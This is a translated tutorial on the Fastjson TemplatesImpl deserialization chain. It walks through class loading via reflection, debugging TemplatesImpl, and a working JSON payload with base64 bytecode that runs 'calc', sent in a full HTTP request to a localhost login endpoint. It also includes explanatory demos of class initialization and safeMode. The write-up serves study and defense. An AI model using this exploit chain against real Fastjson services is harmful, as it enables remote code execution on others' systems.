Contents

1. Class loading and reflective invocation
1.1 Class loading
1.2 Test code
1.3 Loading and instantiating the Evil class via class loading and reflection
2. Debugging the Fastjson TemplatesImpl chain
2.1 Chain overview
2.2 Debugging and building the exploit chain
3. Exploiting TemplatesImpl through fastjson deserialization
3.1 What enabling Feature.SupportNonPublicField does
3.2 Building the payload
3.3 Simulating a real environment

1. Class loading and reflective invocation

1.1 Class loading

Instantiating a class goes through the following four steps, in this order:

1. Loading
2. Linking
3. Initialization
4. Instantiation

A word on static blocks (static initializer blocks): a static block is a block of code executed when the class is loaded, used for static initialization work. Note that when the same JVM instantiates a class several times, the constructor runs on every instantiation, while the static block runs only on the first one.

Note: actual testing differs somewhat from the theory above, and I am not sure why. In short, the static block is in theory called when the class is loaded, but in practice it is only called when the class is instantiated (mind where the Evil class is placed). We see that when the class is instantiated several times, the static block runs only the first time the class is loaded, which is the problem just mentioned: in theory the static block should run when the class is loaded, but in testing, without a further instantiation, the static block is not executed. Some may say that since a static block only ever runs once, perhaps it had already run earlier and that is why it does not run again; uncommenting the lines shows that this is not the case. The execution of this static block really is a bit odd.

1.2 Test code

Create an Evil class:

```java
public class Evil {
    static {
        System.out.println("静态代码块");
    }

    {
        System.out.println("构造代码块");
    }

    public Evil() {
        System.out.println("无参构造");
    }

    public Evil(String arg) {
        System.out.println("有参构造");
    }
}
```

The class-loading code:

```java
package com.example.test;

public class test {
    public static void main(String[] args) throws Exception {
        Class<?> clazz = ClassLoader.getSystemClassLoader().loadClass("Evil"); // load the class
        clazz.newInstance(); // instantiate Evil
        System.out.println("-------------");
        clazz.newInstance();
//        System.out.println("-------------");
//        // get the class's constructor (assume there is one taking a String)
//        Constructor<?> constructor = clazz.getConstructor(String.class);
//        // create an instance, passing the argument
//        Object evilInstance = constructor.newInstance("asd");
    }
}
```

1.3 Loading and instantiating the Evil class via class loading and reflection

This is another way of instantiating the Evil class through class loading. loadClass and defineClass are both methods of java.lang.ClassLoader, but loadClass above is public and can be called directly, while defineClass below is protected and has to be called through reflection. Looking only at how these two methods can trigger the vulnerability: for loadClass one argument must be controllable and the class must be instantiated; for defineClass four arguments must be controllable and the class must be instantiated.

```java
protected final Class<?> defineClass(String name, byte[] b, int off, int len);
```

- name: the name of the class to be loaded.
- b: the byte array holding the bytecode of the class to be loaded.
- off: the position in the array at which loading starts, usually 0, i.e. from the beginning.
- len: the number of bytes to load, usually bytes.length, i.e. the whole array.

Here is the code for the ideal case and its execution result:

```java
package com.example.test;

import java.lang.reflect.Method;
import java.nio.file.Files;
import java.nio.file.Paths;

public class test {
    public static void main(String[] args) throws Exception {
//        Class<?> clazz = ClassLoader.getSystemClassLoader().loadClass("Evil"); // load the class
//        clazz.newInstance(); // instantiate Evil
//        System.out.println("-------------");
//        clazz.newInstance();
//        System.out.println("-------------");
//        // get the class's constructor (assume there is one taking a String)
//        Constructor<?> constructor = clazz.getConstructor(String.class);
//        // create an instance, passing the argument
//        Object evilInstance = constructor.newInstance("asd");

        // call defineClass through reflection
        ClassLoader c1 = ClassLoader.getSystemClassLoader(); // obtain a class loader
        // use reflection to get the defineClass method of ClassLoader
        Method m = ClassLoader.class.getDeclaredMethod("defineClass", String.class, byte[].class, int.class, int.class);
        // make it accessible; this method defines a class
        m.setAccessible(true);
        // read a class file from the file system into the bytes array
        byte[] bytes = Files.readAllBytes(Paths.get("D:\\code\\java\\fastjson\\target\\classes\\Evil.class"));
        // invoking defineClass turns the bytecode into a Class object, returned as clazz1
        Class clazz1 = (Class) m.invoke(c1, "Evil", bytes, 0, bytes.length);
        // instantiate the object
        clazz1.newInstance();
    }
}
```

The Evil class is unchanged from 1.2.
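The puzzle in 1.1 comes down to the JVM's initialization rules: ClassLoader.loadClass only loads (and, when required, links) the class, and initialization, which is what runs the static block, is deferred until the first active use such as newInstance; Class.forName(name) initializes eagerly, while Class.forName(name, false, loader) does not. The following is an added example, not code from the original post; the helper class Probe and its messages are constructed for it, and the file is assumed to be saved as InitDemo.java in the default package.

```java
// InitDemo.java: added example, not code from the original post. The helper class "Probe"
// and its messages are constructed for this demo; the post's Evil class is not used here.
import java.lang.reflect.Constructor;

public class InitDemo {
    public static void main(String[] args) throws Exception {
        ClassLoader cl = ClassLoader.getSystemClassLoader();

        // 1. loadClass only loads (and, when required, links) the class. The JVM defers
        //    initialization, which is what runs the static block, until first active use.
        Class<?> c = cl.loadClass("Probe");
        System.out.println("after loadClass: no static block yet");

        // 2. Class.forName with initialize=false does not initialize either.
        Class.forName("Probe", false, cl);
        System.out.println("after forName(initialize=false): still no static block");

        // 3. Class.forName(name) defaults to initialize=true: the static block runs now, exactly once.
        Class.forName("Probe");

        // 4. Every instantiation runs the instance initializer and a constructor, but the
        //    static block is never run again for the lifetime of this JVM.
        Constructor<?> ctor = c.getConstructor(String.class);
        ctor.newInstance("first");
        c.getDeclaredConstructor().newInstance();
    }
}

// Second top-level class in the same file (package-private). The program is started through
// InitDemo, so Probe is not initialized merely by launching the JVM.
class Probe {
    static {
        System.out.println("Probe: static block (initialization)");
    }

    {
        System.out.println("Probe: instance initializer");
    }

    public Probe() {
        System.out.println("Probe: no-arg constructor");
    }

    public Probe(String arg) {
        System.out.println("Probe: String constructor, arg=" + arg);
    }
}
```

Compile and run with `javac InitDemo.java && java InitDemo`: the two "no static block" lines print first, then the static block message once, then the initializer/constructor pair twice. Comment out step 3 and the static block message moves to step 4, immediately before the first constructor message: that is the behaviour the post observed, where loadClass alone prints nothing and the static block only appears on the first newInstance.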
2. Debugging the Fastjson TemplatesImpl chain

This chain is built on the defineClass method above, i.e. the more cumbersome one.

2.1 Chain overview

Create a new class, import TemplatesImpl and step into defineClass at line 414; following it further shows that it is the defineClass method of ClassLoader. That satisfies the first condition: we have found a controllable defineClass. The chain so far:

defineTransletClasses -> loader.defineClass -> defineClass

As seen above, defineTransletClasses is private and cannot be called directly either, so we look at where it is called. Stepping in directly (Ctrl+click) does not work the first time; right-click, choose Find Usages, and then it can be followed. One question: there are three call sites, so why follow the last one? Because in reproducing this chain we are retracing the path others have already used, so we copy it; interested readers can check for themselves whether the other call sites also work. Stepping in, two if conditions must hold: _name must not be null and _class must be null. A quick look shows that both _name and _class are null by default, so only _name needs to be set via reflection. When everything goes well, class loading completes at line 451 and line 455 calls newInstance to instantiate the class. So both trigger conditions are met: the class-loading parameters are controllable, and the loaded class is instantiated. One remaining problem: getTransletInstance at line 446 is still not public, so we look for where getTransletInstance is called and arrive at newTransformer at line 481, which is public. The whole chain:

newTransformer -> getTransletInstance -> defineTransletClasses -> loader.defineClass -> defineClass

2.2 Debugging and building the exploit chain

Code:

```java
package com.example.test;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;

public class test3 {
    public static void main(String[] args) throws Exception {
        TemplatesImpl temp = new TemplatesImpl();
        temp.newTransformer();
    }
}
```

Set a breakpoint and follow it: _name is null by default, so it returns immediately. So we set a value for _name via reflection. With _name set, continuing shows an error at line 395 and the program exits.

```java
package com.example.test;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;

import java.lang.reflect.Field;

public class test3 {
    public static void main(String[] args) throws Exception {
        TemplatesImpl temp = new TemplatesImpl();
        Class aClass = temp.getClass();
        Field filedname = aClass.getDeclaredField("_name"); // _name is private, so access checks must be bypassed
        filedname.setAccessible(true);
        filedname.set(temp, "xbb");
        temp.newTransformer();
    }
}
```

Analysis: _tfactory must not be null. A full-text search shows what this field is normally assigned; set it directly via reflection and continue.

```java
package com.example.test;

import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;

import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;

public class test3 {
    public static void main(String[] args) throws Exception {
        TemplatesImpl temp = new TemplatesImpl();
        Class aClass = temp.getClass();
        Field filedname = aClass.getDeclaredField("_name"); // _name is private, so access checks must be bypassed
        filedname.setAccessible(true);
        filedname.set(temp, "xbb");

        Field filebytecodes = aClass.getDeclaredField("_bytecodes");
        byte[] bytes = Files.readAllBytes(Paths.get("D:\\code\\java\\fastjson\\target\\classes\\Evil.class"));
        filebytecodes.setAccessible(true);
        // the field is a two-dimensional byte array
        filebytecodes.set(temp, new byte[][]{bytes});

        Field filebtfactory = aClass.getDeclaredField("_tfactory");
        filebtfactory.setAccessible(true);
        filebtfactory.set(temp, new TransformerFactoryImpl());

        temp.newTransformer();
    }
}
```

Still an error. It takes the Evil class we passed in and gets its superclass, which is Object; Object is certainly not ABSTRACT_TRANSLET, so execution goes straight into the else branch and fails. We make the class extend the required parent and implement its two abstract methods:

```java
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

public class Evil extends AbstractTranslet {
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
    }

    static {
        System.out.println("静态代码块");
    }

    {
        System.out.println("构造代码块");
    }

    public Evil() {
        System.out.println("无参构造");
    }

    public Evil(String arg) {
        System.out.println("有参构造");
    }
}
```

Remember to recompile to get the new Evil.class. Now it runs through: although an error is still reported, our class has been loaded and executed. The final code is test3 exactly as in the last listing above, together with this Evil class.

3. Exploiting TemplatesImpl through fastjson deserialization

This chain is rarely used in real engagements; one reason is that it comes with some restrictions.

3.1 What enabling Feature.SupportNonPublicField does

It requires JSON.parseObject or JSON.parse. First, what Feature.SupportNonPublicField does. Look at ordinary JSON deserialization, then comment out the set/get methods: because the setters and getters for the age and username properties are removed, the output is empty. Now add Feature.SupportNonPublicField and look again: it is as if set/get methods had been added for the properties. When we analysed the TemplatesImpl chain above, careful readers may have noticed that the class involved lacks set/get methods, so the condition for this chain is that the developer passes Feature.SupportNonPublicField when deserializing JSON; that is the prerequisite for using this chain.

3.2 Building the payload

Straight to the code. Rebuild the Evil class with a calculator pop-up added:

```java
import com.sun.org.apache.xalan.internal.xsltc.DOM;
import com.sun.org.apache.xalan.internal.xsltc.TransletException;
import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;
import com.sun.org.apache.xml.internal.serializer.SerializationHandler;

import java.io.IOException;

public class Evil extends AbstractTranslet {
    @Override
    public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
    }

    @Override
    public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
    }

    static {
        System.out.println("静态代码块");
        try {
            Runtime.getRuntime().exec("calc");
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
    }

    {
        System.out.println("构造代码块");
    }

    public Evil() {
        System.out.println("无参构造");
    }

    public Evil(String arg) {
        System.out.println("有参构造");
    }
}
```
```java
package com.example.test;

import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.parser.Feature;

import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Base64;

public class test4 {
    public static void main(String[] args) throws Exception {
        byte[] bytes = Files.readAllBytes(Paths.get("D:\\code\\java\\fastjson\\target\\classes\\Evil.class"));
        String code = Base64.getEncoder().encodeToString(bytes);
        final String NASTY_CLASS = "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl";
        String payload = "{\"@type\":\"" + NASTY_CLASS + "\",\"_bytecodes\":[\"" + code + "\"],'_name':'xbb','_tfactory':{},\"_outputProperties\":{}}\n";
        System.out.println(payload);
        JSON.parseObject(payload, Feature.SupportNonPublicField);
    }
}
```

It works as expected.

Two points here. First, why base64-encode: alibaba\fastjson\parser\JSONScanner.class performs a decoding step during deserialization:

```java
public byte[] bytesValue() {
    return IOUtils.decodeBase64(this.text, this.np + 1, this.sp);
}
```

Second, what the extra "_outputProperties" is for is not followed here; if interested, see https://blog.csdn.net/qq_35733751/article/details/119948833. The final payload (base64 of Evil.class omitted here):

{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["..."],'_name':'xbb','_tfactory':{},"_outputProperties":{}}

3.3 Simulating a real environment

The full request:

```
POST /login HTTP/1.1
Host: localhost:8080
Content-Length: 2688
sec-ch-ua: "Chromium";v="95", ";Not A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=580930AAC50A1A850BE624BD09D5DE32
Connection: close

{"@type":"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl","_bytecodes":["yv66vgAAADQATAoADwAuCQAvADAIADEKADIAMwgANAgANQgANgoANwA4CAA5CgA3ADoHADsHADwKAAwAPQcAPgcAPwEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBABJMb2NhbFZhcmlhYmxlVGFibGUBAAR0aGlzAQAGTEV2aWw7AQAIZG9jdW1lbnQBAC1MY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAQltMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEACkV4Y2VwdGlvbnMHAEABAKYoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvZHRtL0RUTUF4aXNJdGVyYXRvcjtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaXRlcmF0b3IBADVMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yOwEAB2hhbmRsZXIBAEFMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOwEABjxpbml0PgEAAygpVgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAA2FyZwEAEkxqYXZhL2xhbmcvU3RyaW5nOwEACDxjbGluaXQAQABZQEAFUxqYXZhL2lvL0lPRXhjZXB0aW9uOwEADVN0YWNrTWFwVGFibGUHADsBAApTb3VyY2VGaWxlAQAJRXZpbC5qYXZhDAAiACMHAEEMAEIAQwEADaehOmAoOS7oeggeWdlwcARAwARQAkAQAM5peg5YC5p6E6YCgAQAM5pyJ5YC5p6E6YCgAQAP6Z2Z5oCB5Luj56CB5Z2XBwBGDABHAEgBAARjYWxjDABJAEoBABNqYXZhL2lvL0lPRXhjZXB0aW9uAQAaamF2YS9sYW5nL1J1bnRpbWVFeGNlcHRpb24MACIASwEABEV2aWwBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhjZXB0aW9uAQAQamF2YS9sYW5nL1N5c3RlbQEAA291dAEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwEAE2phdmEvaW8vUHJpbnRTdHJlYW0BAAdwcmludGxuAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEAGChMamF2YS9sYW5nL1Rocm93YWJsZTspVgAhAA4ADwAAAAAABQABABAAEQACABIAAAA/AAAAAwAAAAGxAAAAAgATAAAABgABAAAADgAUAAAAIAADAAAAAQAVABYAAAAAAAEAFwAYAAEAAAABABkAGgACABsAAAAEAAEAHAABABAAHQACABIAAABJAAAABAAAAAGxAAAAAgATAAAABgABAAAAEwAUAAAAKgAEAAAAAQAVABYAAAAAAAEAFwAYAAEAAAABAB4AHwACAAAAAQAgACEAAwAbAAAABAABABwAAQAiACMAAQASAAAASwACAAEAAAAVKrcAAbIAAhIDtgAEsgACEgW2AASxAAAAAgATAAAAEgAEAAAAIwAEACAADAAkABQAJQAUAAAADAABAAAAFQAVABYAAAABACIAJAABABIAAABVAAIAAgAAABUqtwABsgACEgO2AASyAAISBrYABLEAAAACABMAAAASAAQAAAApAAQAIAAMACoAFAArABQAAAAWAAIAAAAVABUAFgAAAAAAFQAlACYAAQAIACcAIwABABIAAAByAAMAAQAAAByAAISB7YABLgACBIJtgAKV6cADUu7AAxZKrcADbxAAEACAARABQACwADABMAAAAaAAYAAAAWAAgAGAARABsAFAAZABUAGgAeAB0AFAAAAAwAAQAVAAkAKAApAAAAKgAAAAcAAlQHACsJAAEALAAAAAIALQ"],'_name':'xbb','_tfactory':{},"_outputProperties":{}}
```

Two things to note here. First, the back-end code has to pass the Feature.SupportNonPublicField parameter. Second, at first I pasted the payload straight into the username field of the login form below and no calculator appeared, which seemed very strange; the two purple markings in the figure above explain it. If the payload is entered in the login form, the server receives it in the following form, so it cannot trigger (base64 omitted):

{"username":"{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\",\"_bytecodes\":[\"...\"],'_name':'xbb','_tfactory':{},\"_outputProperties\":{}}","password":"{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\",\"_bytecodes\":[\"...\"],'_name':'xbb','_tfactory':{},\"_outputProperties\":{}}"}
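Sections 3.1 and 3.3 both turn on one configuration decision: whether the parser is allowed to populate non-public fields, and whether it honours an "@type" key at all. The following is an added example, not code from the original post; the Account class and its sample JSON are constructed for it, fastjson is assumed to be on the classpath, and the safeMode switch is assumed to be available (it exists in fastjson 1.2.68 and later; the post does not state which version it used, so on older versions the practical defence is to upgrade).

```java
// FeatureDemo.java: added example, not code from the original post. "Account" and the
// sample JSON are constructed; fastjson 1.2.68+ is assumed for ParserConfig.setSafeMode.
import com.alibaba.fastjson.JSON;
import com.alibaba.fastjson.JSONException;
import com.alibaba.fastjson.parser.Feature;
import com.alibaba.fastjson.parser.ParserConfig;

public class FeatureDemo {

    // Harmless target class: private fields, no setters and no getters, like the
    // age/username class in section 3.1 after its set/get methods were commented out.
    public static class Account {
        private String username;
        private int age;

        @Override
        public String toString() {
            return "Account{username=" + username + ", age=" + age + "}";
        }
    }

    public static void main(String[] args) {
        String json = "{\"username\":\"alice\",\"age\":30}";

        // Default features: there are no setters, so the private fields stay untouched.
        Account a1 = JSON.parseObject(json, Account.class);
        System.out.println("default:               " + a1); // username=null, age=0

        // SupportNonPublicField: fastjson writes the private fields reflectively, as if
        // setters existed. This is the same switch that lets "_bytecodes", "_name" and
        // "_tfactory" of TemplatesImpl be filled from JSON in section 3.2.
        Account a2 = JSON.parseObject(json, Account.class, Feature.SupportNonPublicField);
        System.out.println("SupportNonPublicField: " + a2); // username=alice, age=30

        // Defender side: with safeMode on, every "@type" key is refused before any class
        // lookup happens, so even a harmless type name is rejected. A "@type" in a request
        // body is therefore also a good thing to alert on in front of such an endpoint.
        ParserConfig.getGlobalInstance().setSafeMode(true);
        String typed = "{\"@type\":\"java.lang.Object\",\"x\":1}";
        try {
            JSON.parseObject(typed, Feature.SupportNonPublicField);
            System.out.println("parsed: safeMode is not in effect");
        } catch (JSONException e) {
            System.out.println("rejected by safeMode: " + e.getMessage());
        }
    }
}
```

The first two prints show why the chain in section 3 needs SupportNonPublicField: without it the parser simply has no way to write into the private fields of TemplatesImpl. The third shows that the type-resolution step, not the field-writing step, is the one to close: with safeMode on, "_bytecodes" is never reached because "@type" is refused outright, regardless of which features the call site passes.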